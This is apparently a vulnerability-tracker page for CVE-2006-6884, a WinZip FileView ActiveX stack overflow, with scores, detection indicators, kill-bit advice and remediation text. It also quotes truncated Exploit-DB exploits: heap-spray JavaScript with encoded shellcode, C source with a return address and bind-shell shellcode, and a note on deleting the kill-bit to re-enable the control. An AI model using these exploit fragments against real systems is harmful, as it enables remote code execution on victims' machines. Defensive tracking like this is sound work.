CVE-2006-6884
published 2006-12-31CVE-2006-6884: Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control (aka Sky Software "FileView" ActiveX control) for WinZip 10.0 Build 6667 allows remote…
PriorityP261critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.49%
90.3th percentile
Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control (aka Sky Software "FileView" ActiveX control) for WinZip 10.0 Build 6667 allows remote attackers to execute arbitrary code via a long argument to the CreateNewFolderFromName method, a different vulnerability than CVE-2006-5198.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| winzip | winzip | — | — |
Detection & IOCsextracted from sources · hover to see the quote
registryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}↗
- →The exploit triggers the vulnerability via the FilePattern property assignment inside the WZFILEVIEW_OnAfterItemAdd VBScript event handler, passing an oversized string to smash the stack. ↗
- →The exploit embeds shellcode inside a crafted BMP image file written to disk; the BMP header is followed by a large NOP sled (999999 bytes) and then shellcode payload. ↗
- →The overflow payload uses 265 'A' bytes before the return address overwrite, followed by 1827 more 'A' bytes; this specific padding pattern can be used in memory forensics or crash analysis. ↗
- →The ActiveX CLSID {A09AE68F-B14D-43ED-B713-BA413F034904} (WZFILEVIEW.FileViewCtrl.61) should be blocked via kill-bit; its absence from the IE ActiveX Compatibility registry key indicates the control is enabled and exploitable. ↗
- ·The return address 0x02DA3269 is specific to WinXP SP2 (English) with WinZip 10.0 build 6667 and IE 6.0.2900.2180; it will not work on other OS/build combinations. ↗
- ·Microsoft had already disabled the ActiveX control via a kill-bit (Compatibility Flags=0x400) prior to this CVE being published; the kill-bit registry key must be absent for the exploit to function. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck4.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-74v5-jm2f-x8j9: Buffer overflow in the WZFILEVIEW
ghsa_unreviewed·2022-05-01·CVSS 4.0
CVE-2006-6884 [MEDIUM] CWE-119 GHSA-74v5-jm2f-x8j9: Buffer overflow in the WZFILEVIEW
Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control (aka Sky Software "FileView" ActiveX control) for WinZip 10.0 Build 6667 allows remote attackers to execute arbitrary code via a long argument to the CreateNewFolderFromName method, a different vulnerability than CVE-2006-5198.
VulnCheck
winzip winzip Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2006·CVSS 4.0
CVE-2006-6884 [MEDIUM] winzip winzip Improper Restriction of Operations within the Bounds of a Memory Buffer
winzip winzip Improper Restriction of Operations within the Bounds of a Memory Buffer
Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control (aka Sky Software "FileView" ActiveX control) for WinZip 10.0 Build 6667 allows remote attackers to execute arbitrary code via a long argument to the CreateNewFolderFromName method, a different vulnerability than CVE-2006-5198.
Affected: winzip winzip
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://web.archive.org/web/20090323012515/http://securitylabs.websense.com/content/Alerts/3326.aspx; https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
WinZip 10.0 - FileView ActiveX Controls Remote Overflow
exploitdb·2006-12-31
CVE-2006-6884 WinZip 10.0 - FileView ActiveX Controls Remote Overflow
WinZip 10.0 - FileView ActiveX Controls Remote Overflow
---
/*
---===[ winzip-exploit.html
XiaoHui : 76693223[at]163com
HomePage: www.nipc.org.cn
(c) 2006 All rights reserved.
note:Because of the prior vuln in FileView ActiveX Control,Micorsoft has disabled this ActiveX Controls,
To test this vuln,You can delete the key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}]
"Compatibility Flags"=dword:00000400
I have test the exploit on Windows 2000+sp4(CN) and Windows xp+sp2(CN) and Winzip 10.0(6667),you can tryother version,goodluck~
]===---
*/
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = unescape( "%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC
Exploit-DB
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
exploitdb·2006-11-15
CVE-2006-6884 WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
---
/* WinZip
*
* - prdelka
*/
#include
#include
#include
#include
#include
#include
#include
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51
Exploit-DB
WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)
exploitdb·2006-11-14
CVE-2006-6884 WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)
WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)
---
# milw0rm.com [2006-11-14]
No writeups or analysis indexed.
2006-12-31
Published
Exploited in the wild